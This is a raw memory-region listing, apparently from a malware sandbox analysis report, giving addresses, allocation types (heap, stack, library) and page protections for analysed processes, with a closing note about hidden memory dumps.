heap
page read and write
22868A83000
trusted library allocation
page read and write
7FFB23A51000
unkown
page execute read
1F1B2303000
heap
page read and write
77E1FFF000
stack
page read and write
7FFAAC8F0000
trusted library allocation
page read and write
207ABF10000
trusted library allocation
page read and write
178DB330000
heap
page read and write
1FB6965D000
heap
page read and write
7FFAAC8B0000
trusted library allocation
page read and write
178C47F8000
trusted library allocation
page read and write
1F891268000
heap
page read and write
1E4CCACE000
heap
page read and write
2284EE40000
heap
page readonly
1FB6B000000
heap
page read and write
E61E4FE000
stack
page read and write
7FFAAC870000
trusted library allocation
page execute and read and write
22850A51000
trusted library allocation
page read and write
7FFAAC980000
trusted library allocation
page read and write
1B956716000
heap
page read and write
7FFAAC910000
trusted library allocation
page read and write
207AD699000
trusted library allocation
page read and write
1B956722000
heap
page read and write
1D168037000
heap
page read and write
7FFAAC890000
trusted library allocation
page read and write
1F1B22E0000
heap
page read and write
207AD77F000
trusted library allocation
page read and write
1E4CCB66000
heap
page read and write
1E4D0079000
trusted library allocation
page read and write
1E4D0082000
trusted library allocation
page read and write
1FB69682000
heap
page read and write
7FFAAC740000
trusted library allocation
page execute and read and write
1E4CE74C000
heap
page read and write
1E4CCA05000
heap
page read and write
3CA5979000
stack
page read and write
1FB696A6000
heap
page read and write
7FFB2277D000
unkown
page readonly
7FFAAC8C0000
trusted library allocation
page read and write
24648C60000
heap
page read and write
3CA5CBB000
stack
page read and write
1FB696A6000
heap
page read and write
77E1EFA000
stack
page read and write
178C124E000
heap
page read and write
77E1BFE000
stack
page read and write
7FFAAC910000
trusted library allocation
page read and write
178C1258000
heap
page read and write
207BC0A0000
trusted library allocation
page read and write
7FFAAC69D000
trusted library allocation
page execute and read and write
1F1B22CE000
heap
page read and write
7FFAAC960000
trusted library allocation
page read and write
22852029000
trusted library allocation
page read and write
7FFAAC69B000
trusted library allocation
page read and write
46EEC4F000
stack
page read and write
3FFF2FE000
stack
page read and write
46EECCF000
stack
page read and write
207C43A0000
heap
page read and write
D1F22FE000
stack
page read and write
753DFE000
stack
page read and write
1D168012000
heap
page read and write
5B247FE000
stack
page read and write
24E3A578000
heap
page read and write
7FFB23A66000
unkown
page readonly
3CA694C000
stack
page read and write
7FFB23A70000
unkown
page read and write
22868D40000
heap
page read and write
24E3A530000
heap
page read and write
1E4CCA10000
heap
page read and write
1F8912B9000
heap
page read and write
1F1B23F4000
heap
page read and write
207C4226000
heap
page read and write
1E4CE700000
trusted library allocation
page read and write
1F1B230A000
heap
page read and write
3FFF1FF000
stack
page read and write
178C3067000
heap
page read and write
7DF41A480000
trusted library allocation
page execute and read and write
D1F320E000
stack
page read and write
7FFAAC8C0000
trusted library allocation
page read and write
1FB6CDF0000
heap
page read and write
46EDDBE000
stack
page read and write
1F1B230D000
heap
page read and write
7FFAAC97E000
trusted library allocation
page read and write
207AC000000
heap
page execute and read and write
1D167FBA000
heap
page read and write
178C4A8E000
trusted library allocation
page read and write
7FFB22780000
unkown
page read and write
1F1B21D0000
heap
page read and write
77E1A7D000
stack
page read and write
1D167FED000
heap
page read and write
207AD691000
trusted library allocation
page read and write
178C31F1000
trusted library allocation
page read and write
7FFAAC730000
trusted library allocation
page read and write
207A9F50000
heap
page read and write
1B9566F9000
heap
page read and write
21C7D840000
heap
page read and write
1D167FCF000
heap
page read and write
1B95671E000
heap
page read and write
1B956722000
heap
page read and write
1B9566ED000
heap
page read and write
1F1B231A000
heap
page read and write
1F1B230A000
heap
page read and write
21C7DAF0000
heap
page read and write
178C1218000
heap
page read and write
3CA670F000
stack
page read and write
2284EF40000
heap
page read and write
207C43AB000
heap
page read and write
D1F273C000
stack
page read and write
1D168120000
heap
page read and write
7FFAAC970000
trusted library allocation
page read and write
3CA57FE000
stack
page read and write
207AA078000
heap
page read and write
178C4836000
trusted library allocation
page read and write
21C7D740000
heap
page read and write
24E3A510000
heap
page read and write
178C4AC4000
trusted library allocation
page read and write
178C30FB000
heap
page read and write
1F1B2290000
heap
page read and write
178C14B0000
heap
page read and write
178C3124000
heap
page read and write
178C30A4000
heap
page read and write
22868F24000
heap
page read and write
7FFAAC831000
trusted library allocation
page read and write
1B9565D0000
heap
page read and write
1B956712000
heap
page read and write
7541FF000
stack
page read and write
3CA69CC000
stack
page read and write
E19FCFD000
stack
page read and write
46EEDCE000
stack
page read and write
7FFAAC940000
trusted library allocation
page read and write
1B95671E000
heap
page read and write
D0BF3F000
unkown
page read and write
7FFAAC73C000
trusted library allocation
page execute and read and write
1F1B22EF000
heap
page read and write
1E4D005F000
trusted library allocation
page read and write
178DB210000
heap
page read and write
1F89128D000
heap
page read and write
22868F46000
heap
page read and write
178C129A000
heap
page read and write
1FB69689000
heap
page read and write
24BB4B60000
heap
page read and write
1F1B22C7000
heap
page read and write
178C47CB000
trusted library allocation
page read and write
24648ADB000
heap
page read and write
7FFAAC8A0000
trusted library allocation
page read and write
207A9FD0000
heap
page read and write
2464A8E0000
heap
page read and write
7FFAAC970000
trusted library allocation
page read and write
2284EC9C000
heap
page read and write
24648AFD000
heap
page read and write
3CA56FE000
stack
page read and write
1E4D0047000
trusted library allocation
page read and write
7FFAAC84A000
trusted library allocation
page read and write
7FFAAC950000
trusted library allocation
page read and write
178D325E000
trusted library allocation
page read and write
207C4230000
heap
page read and write
178C309F000
heap
page read and write
207AD785000
trusted library allocation
page read and write
1F891210000
heap
page read and write
1E4D004B000
trusted library allocation
page read and write
77E16A5000
stack
page read and write
7FFAAC980000
trusted library allocation
page read and write
1F891240000
heap
page read and write
22860A61000
trusted library allocation
page read and write
1E4D02C3000
trusted library allocation
page read and write
1F89135D000
heap
page read and write
D1F344C000
stack
page read and write
178C3072000
heap
page read and write
178C125C000
heap
page read and write
207AA084000
heap
page read and write
1FB6968E000
heap
page read and write
22868AC1000
heap
page read and write
22852058000
trusted library allocation
page read and write
1FB69665000
heap
page read and write
1D167F50000
heap
page read and write
753CFD000
stack
page read and write
7FFB23A50000
unkown
page readonly
1FB695E0000
heap
page read and write
1FB6968D000
heap
page read and write
2284EC6F000
heap
page read and write
E19FDFE000
stack
page read and write
178C4D49000
trusted library allocation
page read and write
207BC040000
trusted library allocation
page read and write
178C31B6000
heap
page execute and read and write
24648AB1000
heap
page read and write
1FB69682000
heap
page read and write
7FFB1E0E0000
unkown
page readonly
1B95671A000
heap
page read and write
1F1B2312000
heap
page read and write
207AA096000
heap
page read and write
1FB6966B000
heap
page read and write
7FFB22760000
unkown
page readonly
7FFAAC9A0000
trusted library allocation
page read and write
7FFAAC9B0000
trusted library allocation
page read and write
1E4CE980000
heap
page execute and read and write
2284EB90000
heap
page read and write
7FFB23A50000
unkown
page readonly
1FB696A6000
heap
page read and write
1B9565A0000
heap
page read and write
1FB698A0000
heap
page read and write
1FB69689000
heap
page read and write
1FB6966D000
heap
page read and write
22852096000
trusted library allocation
page read and write
1D168012000
heap
page read and write
1E4CFDB1000
trusted library allocation
page read and write
7FFAAC906000
trusted library allocation
page read and write
1FB69646000
heap
page read and write
7FFAAC890000
trusted library allocation
page read and write
2284EE50000
trusted library allocation
page read and write
1B959DC0000
heap
page read and write
22869110000
heap
page read and write
7FFB22780000
unkown
page read and write
207ABAB5000
heap
page read and write
1F1B2470000
heap
page read and write
178C4AC8000
trusted library allocation
page read and write
77E1D79000
stack
page read and write
1FB69689000
heap
page read and write
7FFB22776000
unkown
page readonly
1E4D0690000
trusted library allocation
page read and write
1E4D00B8000
trusted library allocation
page read and write
1E4DEA71000
trusted library allocation
page read and write
1F1B21F0000
heap
page read and write
1F1B22B1000
heap
page read and write
1F1B4098000
heap
page read and write
228525A5000
trusted library allocation
page read and write
7FFAAC950000
trusted library allocation
page read and write
1F1B2312000
heap
page read and write
D1F25B9000
stack
page read and write
1FB698A5000
heap
page read and write
1F1B22EF000
heap
page read and write
1B95671A000
heap
page read and write
1F1B2303000
heap
page read and write
1F1B22DE000
heap
page read and write
178C30F8000
heap
page read and write
22852052000
trusted library allocation
page read and write
5B23D69000
stack
page read and write
7FFAAC850000
trusted library allocation
page execute and read and write
3CA678E000
stack
page read and write
1B9566D6000
heap
page read and write
1F1B4090000
heap
page read and write
D0BEB9000
stack
page read and write
7FFAAC766000
trusted library allocation
page execute and read and write
8F67FBB000
stack
page read and write
24E3A570000
heap
page read and write
207AD8CB000
trusted library allocation
page read and write
1B95671E000
heap
page read and write
2284EE76000
heap
page execute and read and write
22868C57000
heap
page read and write
1D167FC7000
heap
page read and write
4E3E1FE000
stack
page read and write
178C14A0000
trusted library allocation
page read and write
46EEE4D000
stack
page read and write
4E3DAFE000
stack
page read and write
7FFAAC84F000
trusted library allocation
page read and write
5B246FF000
stack
page read and write
1E4CC9D0000
heap
page read and write
1FACEB50000
heap
page read and write
1D167FC0000
heap
page read and write
21C7D940000
heap
page read and write
1F1B22EC000
heap
page read and write
207ABED3000
trusted library allocation
page read and write
207C43DE000
heap
page read and write
178C3100000
heap
page read and write
1B956694000
heap
page read and write
D1F334F000
stack
page read and write
207AD662000
trusted library allocation
page read and write
7FFAAC690000
trusted library allocation
page read and write
7FFAAC7A0000
trusted library allocation
page execute and read and write
7FFAAC74C000
trusted library allocation
page execute and read and write
3CA5C39000
stack
page read and write
1B95671A000
heap
page read and write
1FACEB54000
heap
page read and write
22860ACF000
trusted library allocation
page read and write
1F891355000
heap
page read and write
2284EF45000
heap
page read and write
1F1B2312000
heap
page read and write
77E172E000
stack
page read and write
7FFAAC840000
trusted library allocation
page execute and read and write
178DB3AC000
heap
page read and write
1F8912B9000
heap
page read and write
7543FD000
stack
page read and write
22868F00000
heap
page read and write
7FFAAC880000
trusted library allocation
page read and write
7FFB1E0F6000
unkown
page readonly
1B958378000
heap
page read and write
1F1B2315000
heap
page read and write
1F892FD0000
heap
page read and write
7FFAAC74C000
trusted library allocation
page execute and read and write
7FFAAC9C0000
trusted library allocation
page read and write
1B9566FB000
heap
page read and write
7FFAAC8B0000
trusted library allocation
page read and write
1B956712000
heap
page read and write
1B9566DD000
heap
page read and write
1E4E6B90000
heap
page read and write
1B956712000
heap
page read and write
7FFAAC960000
trusted library allocation
page read and write
1B95671E000
heap
page read and write
1F1B2329000
heap
page read and write
1F1B230A000
heap
page read and write
207C4407000
heap
page read and write
77E1E7E000
stack
page read and write
1F8911F0000
heap
page read and write
7FFAAC684000
trusted library allocation
page read and write
7FFAAC920000
trusted library allocation
page read and write
7FFAAC910000
trusted library allocation
page read and write
7FFAAC9D0000
trusted library allocation
page read and write
1FACEB30000
heap
page read and write
7FFAAC6AB000
trusted library allocation
page read and write
178DB33C000
heap
page read and write
7FFAAC820000
trusted library allocation
page read and write
D1F283B000
stack
page read and write
207AD6E7000
trusted library allocation
page read and write
1FB6965E000
heap
page read and write
1F1B22E9000
heap
page read and write
7FFB1E105000
unkown
page readonly
1F89126E000
heap
page read and write
1E4D0694000
trusted library allocation
page read and write
5B241FE000
stack
page read and write
7FFAAC8E0000
trusted library allocation
page read and write
E19FAFF000
stack
page read and write
22860C05000
trusted library allocation
page read and write
207AA0BE000
heap
page read and write
7FFAAC916000
trusted library allocation
page read and write
1E4E6AA4000
heap
page read and write
24E3A430000
heap
page read and write
7FFAAC930000
trusted library allocation
page read and write
1FB6962C000
heap
page read and write
7FFAAC730000
trusted library allocation
page read and write
4E3DEFF000
stack
page read and write
1E4D0349000
trusted library allocation
page read and write
E61E5FE000
stack
page read and write
22868F35000
heap
page read and write
178C4AD5000
trusted library allocation
page read and write
207AD8F7000
trusted library allocation
page read and write
7FFB23A75000
unkown
page readonly
7FFAAC740000
trusted library allocation
page execute and read and write
7FFAAC682000
trusted library allocation
page read and write
87359CE000
unkown
page read and write
7FFB1E0F6000
unkown
page readonly
1FACEBD8000
heap
page read and write
178C11D0000
trusted library allocation
page read and write
1FB69682000
heap
page read and write
207AD6E5000
trusted library allocation
page read and write
7FFAAC990000
trusted library allocation
page read and write
1B95671E000
heap
page read and write
7FFB23A50000
unkown
page readonly
1E4CCAF5000
heap
page read and write
22868C85000
heap
page read and write
7FFAAC8C0000
trusted library allocation
page read and write
207AC262000
trusted library allocation
page read and write
1FB69610000
heap
page read and write
5B245FE000
stack
page read and write
1FB69689000
heap
page read and write
1D167FCF000
heap
page read and write
7FFAAC910000
trusted library allocation
page read and write
207AD6A1000
trusted library allocation
page read and write
1FB6966B000
heap
page read and write
D1F21FE000
stack
page read and write
7FFB22782000
unkown
page readonly
207C4260000
heap
page execute and read and write
1FB696A6000
heap
page read and write
7FFAAC6AB000
trusted library allocation
page read and write
1E4CE380000
heap
page read and write
7FFAAC9E0000
trusted library allocation
page read and write
7FFAAC69D000
trusted library allocation
page execute and read and write
7FFAAC97C000
trusted library allocation
page read and write
22868EE9000
heap
page read and write
178C1150000
heap
page read and write
178DB300000
heap
page execute and read and write
228522C9000
trusted library allocation
page read and write
E61E8FF000
stack
page read and write
178C4E13000
trusted library allocation
page read and write
1F891240000
heap
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
E19F6FE000
stack
page read and write
7FFB1E0E0000
unkown
page readonly
46EDD79000
stack
page read and write
7FFAAC9B0000
trusted library allocation
page read and write
1D168195000
heap
page read and write
7FFAAC746000
trusted library allocation
page read and write
46EEC0D000
stack
page read and write
3CA5A3C000
stack
page read and write
2284EC4F000
heap
page read and write
7FFB22776000
unkown
page readonly
1F1B22EA000
heap
page read and write
1E4CE860000
heap
page read and write
1E4D05CA000
trusted library allocation
page read and write
1F89128D000
heap
page read and write
1FB69631000
heap
page read and write
178C2B53000
trusted library allocation
page read and write
2284EF65000
heap
page read and write
1B9566D6000
heap
page read and write
5B243FF000
stack
page read and write
7FFAAC776000
trusted library allocation
page execute and read and write
1B956712000
heap
page read and write
207AD69D000
trusted library allocation
page read and write
2284EC22000
heap
page read and write
1FB69682000
heap
page read and write
77E2B4E000
stack
page read and write
7FFAAC7B0000
trusted library allocation
page execute and read and write
1FACEBD0000
heap
page read and write
1E4E6D70000
heap
page read and write
1F1B2298000
heap
page read and write
178C122E000
heap
page read and write
1E4DEAD7000
trusted library allocation
page read and write
7FFB22782000
unkown
page readonly
1F1B22B1000
heap
page read and write
1F89123B000
heap
page read and write
1B956722000
heap
page read and write
7FFAAC980000
trusted library allocation
page read and write
3CA567F000
stack
page read and write
4E3DDFF000
stack
page read and write
207AD678000
trusted library allocation
page read and write
178C2CA0000
heap
page read and write
7FFAAC990000
trusted library allocation
page read and write
1B9566EF000
heap
page read and write
3FFF5FE000
stack
page read and write
7FFAAC9B0000
trusted library allocation
page read and write
46EED4C000
stack
page read and write
1B9566FB000
heap
page read and write
D1F23FD000
stack
page read and write
D1F26BE000
stack
page read and write
7FFB23A6D000
unkown
page readonly
There are 985 hidden memdumps, click here to show them.